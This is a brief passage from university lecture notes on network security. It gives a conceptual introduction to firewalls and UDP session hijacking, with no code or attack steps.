 Cryptography & Network Security Dept of CSE
 If firewall protection is in place, it will notify the user and block any
unauthorized incoming packets.

A Scenario of UDP Session Hijacking:

 In UDP session hijacking, an attacker doesn’t need features like Transmission

control protocol, for example, sequence numbers and ACK mechanism to do
session hijacking.
 These attacks took place in the wild back at the beginning of 1995. In this
attack, an attacker is concerned about the connection between terminals.

Vishnu Institute of Technology Mrs P. V. Vijaya DUrga